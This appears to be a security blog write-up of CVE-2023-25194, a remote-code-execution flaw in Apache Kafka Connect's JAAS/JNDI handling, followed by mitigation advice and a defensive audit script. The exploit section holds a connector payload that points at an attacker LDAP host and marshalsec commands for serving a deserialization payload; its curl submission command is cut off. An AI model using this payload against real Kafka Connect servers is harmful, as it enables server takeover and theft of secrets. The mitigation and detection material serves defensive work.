CVE-2023-25194 - Remote Code Execution Vulnerability in Apache Kafka Connect Explained

A critical security vulnerability has been discovered in Apache Kafka Connect, tracked as CVE-2023-25194. This flaw allows attackers with access to the Kafka Connect REST API to achieve Remote Code Execution (RCE) on backend servers via a malicious JAAS configuration and a crafted LDAP server. The vulnerability is present in default Apache Kafka Connect installations since version 3.0.0 and can have severe consequences if not properly mitigated.

This post will break down what the vulnerability is, how an attacker could use it, show proof-of-concept code, and give practical advice on how to secure your Kafka Connect clusters.

Background: What Is Apache Kafka Connect?

Apache Kafka Connect is a tool used for connecting Kafka with external systems like databases or key-value stores. Kafka Connect uses connectors and exposes them through a REST API, making configuration and management easy—but that flexibility also brings risk.

Where's the Problem?

Since Kafka 2.3.0, users who can access the Kafka Connect REST API can set certain configuration fields for connectors. Critical among these is the sasl.jaas.config property, which defines authentication providers.

The bug:
If an attacker sets this property to com.sun.security.auth.module.JndiLoginModule, Kafka Connect connects to an attacker-controlled LDAP server and deserializes whatever that server returns, leading to Remote Code Execution.

The property can be set through any of the client override keys that a connector configuration accepts:

- producer.override.sasl.jaas.config
- consumer.override.sasl.jaas.config
- admin.override.sasl.jaas.config

Attackers can submit a connector configuration with any of the fields above targeting JNDI.

Example Vulnerable Configuration

```json
{
  "name": "evil-connector",
  "config": {
    "connector.class": "MyCustomConnector",
    "tasks.max": "1",
    "producer.override.sasl.mechanism": "PLAIN",
    "producer.override.security.protocol": "SASL_PLAINTEXT",
    "producer.override.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://attacker-ldap.com:1389/Exploit\" useFirstPass=true;"
  }
}
```

This instructs Kafka Connect to connect to attacker-ldap.com:1389 via JNDI and deserialize the LDAP response.

Spin up a Malicious LDAP Server:

Use marshalsec (a tool for exploiting JNDI lookups) to create a server that serves up a Java deserialization payload.

```bash
git clone https://github.com/mbechler/marshalsec.git
mvn clean package -DskipTests
java -cp target/marshalsec-*-all.jar marshalsec.jndi.LDAPRefServer "http://your-server/payload"
```

Submit the Connector Configuration:

```bash
curl -X POST http://kafka-connect-server:8083/connectors \
-H "Content-Type: application/json" \
```

RCE Gained:

Once deserialized, whatever code was served by the attacker's LDAP server gets executed on the Kafka Connect server's JVM.

Technical Root Cause

This is a classic Java deserialization attack over JNDI. When Kafka Connect processes the connector config, the following happens:

- It loads the sasl.jaas.config string.
- If it names JndiLoginModule, Kafka Connect tries to authenticate using JNDI and connects to the attacker-controlled LDAP server specified in user.provider.url.
- The LDAP response is deserialized on the Kafka Connect worker's JVM, which is where the attacker's payload executes.

Impact

- RCE (Remote Code Execution): An attacker can run arbitrary code on your server.
- Full Cluster Takeover: Once in, attackers can move laterally, steal secrets, or pivot to other systems.

Affected Versions

- Vulnerable: Apache Kafka Connect 3.0.0 – 3.3.x (out-of-box, unless configured otherwise)
- Potentially Vulnerable: Kafka Connect 2.3.0 – 2.8.x (if an insecure "client override policy" is in use)

Mitigation Steps

1. Upgrade Kafka Connect to 3.4.0 or Higher

- Version 3.4.0 adds the -Dorg.apache.kafka.disallowed.login.modules system property, which, by default, disables com.sun.security.auth.module.JndiLoginModule.

```bash
# Example starting Kafka Connect with the mitigation property
export KAFKA_OPTS="-Dorg.apache.kafka.disallowed.login.modules=com.sun.security.auth.module.JndiLoginModule"
./bin/connect-distributed.sh config/connect-distributed.properties
```


2. Restrict Client Overrides

Set a connector client override policy that prevents dangerous client properties from being overridden through connector configurations. This blocks the attack even if the REST API is reachable.

Example (in connect-distributed.properties)

```properties
# The default policy "All" lets a connector config override any producer,
# consumer or admin client property, including sasl.jaas.config.
# "None" rejects every override; alternatively, ship a custom policy that
# restricts the specific keys you need to deny.
connector.client.config.override.policy=None
```

3. Validate Connector Configurations

- Allow only trusted admins to create/modify connectors.
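The following audit script is an added example for this write-up; it is not code from the original post or from the Kafka project. It applies the root-cause description above (a JAAS entry naming JndiLoginModule in any sasl.jaas.config or client override key) to connector definitions in the same shape as the JSON shown earlier, so it can run over the output of the Connect REST API's connector listing or over configs held in version control before they are submitted. It also checks whether a KAFKA_OPTS string explicitly sets the 3.4.0 disallowed-login-modules property. The sample connectors are constructed here; the hostname attacker-ldap.example is a placeholder.

```python
"""Audit Kafka Connect connector configurations for CVE-2023-25194 exposure."""
import re
from typing import Dict, Iterable, List, Optional

# Login module named by the advisory; disallowed by default from Kafka 3.4.0 on.
JNDI_LOGIN_MODULE = "com.sun.security.auth.module.JndiLoginModule"
DISALLOWED_PROP = "org.apache.kafka.disallowed.login.modules"

# Connector config keys whose value is a JAAS login entry.
JAAS_KEY = "sasl.jaas.config"
OVERRIDE_PREFIXES = ("producer.override.", "consumer.override.", "admin.override.")
JAAS_FLAGS = {"required", "requisite", "sufficient", "optional"}


def parse_jaas_entry(jaas: str) -> Optional[dict]:
    """Parse one JAAS login entry: <ModuleClass> <flag> [key=value ...];

    Quoted values may contain spaces. Returns None for a malformed entry.
    """
    text = jaas.strip().rstrip(";").strip()
    # A token is a run of unquoted non-space chars and/or double-quoted segments.
    tokens = re.findall(r'(?:[^\s"]+|"[^"]*")+', text)
    if len(tokens) < 2 or tokens[1].lower() not in JAAS_FLAGS:
        return None
    options = {}
    for tok in tokens[2:]:
        key, sep, value = tok.partition("=")
        if not sep:
            return None
        options[key] = value.strip('"')
    return {"module": tokens[0], "flag": tokens[1].lower(), "options": options}


def jaas_keys(config: Dict[str, str]) -> Iterable[str]:
    """Yield the keys carrying a JAAS string: sasl.jaas.config and its client overrides."""
    for key in config:
        if key == JAAS_KEY or (key.startswith(OVERRIDE_PREFIXES) and key.endswith("." + JAAS_KEY)):
            yield key


def find_jndi_login_modules(connector: dict) -> List[dict]:
    """Return one finding per JAAS entry in the connector that names JndiLoginModule."""
    findings = []
    config = connector.get("config", {})
    for key in jaas_keys(config):
        entry = parse_jaas_entry(config[key])
        if entry is not None and entry["module"] == JNDI_LOGIN_MODULE:
            findings.append({
                "connector": connector.get("name", "<unnamed>"),
                "key": key,
                "module": entry["module"],
                "provider_url": entry["options"].get("user.provider.url"),
            })
    return findings


def opts_explicitly_disallow_jndi(kafka_opts: str) -> bool:
    """True when KAFKA_OPTS sets the disallowed-login-modules property to a list
    containing JndiLoginModule. An empty list would re-enable the module, so it
    counts as not mitigated. On 3.4.0+ the default already covers JndiLoginModule,
    so this check is for catching a weakened explicit setting.
    """
    match = re.search(r"-D" + re.escape(DISALLOWED_PROP) + r"=(\S*)", kafka_opts)
    if match is None:
        return False
    modules = {m.strip() for m in match.group(1).split(",") if m.strip()}
    return JNDI_LOGIN_MODULE in modules


# Constructed sample connectors (not taken from a real cluster).
SAMPLE_CONNECTORS = [
    {
        "name": "evil-connector",
        "config": {
            "connector.class": "MyCustomConnector",
            "tasks.max": "1",
            "producer.override.sasl.mechanism": "PLAIN",
            "producer.override.security.protocol": "SASL_PLAINTEXT",
            "producer.override.sasl.jaas.config":
                'com.sun.security.auth.module.JndiLoginModule required '
                'user.provider.url="ldap://attacker-ldap.example:1389/Exploit" useFirstPass=true;',
        },
    },
    {
        "name": "benign-connector",
        "config": {
            "connector.class": "FileStreamSink",
            "tasks.max": "1",
            "consumer.override.sasl.jaas.config":
                'org.apache.kafka.common.security.plain.PlainLoginModule required '
                'username="connect" password="<placeholder>";',
        },
    },
]

if __name__ == "__main__":
    for connector in SAMPLE_CONNECTORS:
        for f in find_jndi_login_modules(connector):
            print(f"[!] {f['connector']}: {f['key']} loads {f['module']} -> {f['provider_url']}")
    opts = "-Dorg.apache.kafka.disallowed.login.modules=" + JNDI_LOGIN_MODULE
    print("explicit disallow of JndiLoginModule:", opts_explicitly_disallow_jndi(opts))
```

Run it against the JSON returned for each connector and treat any finding as an incident to investigate, not just a misconfiguration: the presence of that entry means someone with REST API access already chose the module. The parser deliberately rejects malformed entries rather than guessing, so pair it with the None override policy above, which makes the worker reject the override outright.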

References

- Apache Kafka CVE-2023-25194 Security Advisory
- Apache Kafka Pull Request addressing the issue
- JNDI Injection Explained by Bishop Fox
- Marshalsec -- Tool for JNDI Exploitation
- Kafka Connect Documentation

Conclusion

CVE-2023-25194 shows how powerful and dangerous connector configuration can be in Apache Kafka Connect. By taking advantage of JAAS settings and JNDI, attackers with simple API access can gain total control of your backend servers.

> If your Kafka Connect cluster is not patched, now is the time.
> Upgrade, restrict overrides, and always validate connector settings.

Stay safe and keep your data moving—securely!

*This security write-up is exclusive and tailored for clarity. If you found it useful, share it and help secure more Kafka installations!*

Timeline

Published on: 02/07/2023 20:15:00 UTC
Last modified on: 02/16/2023 16:44:00 UTC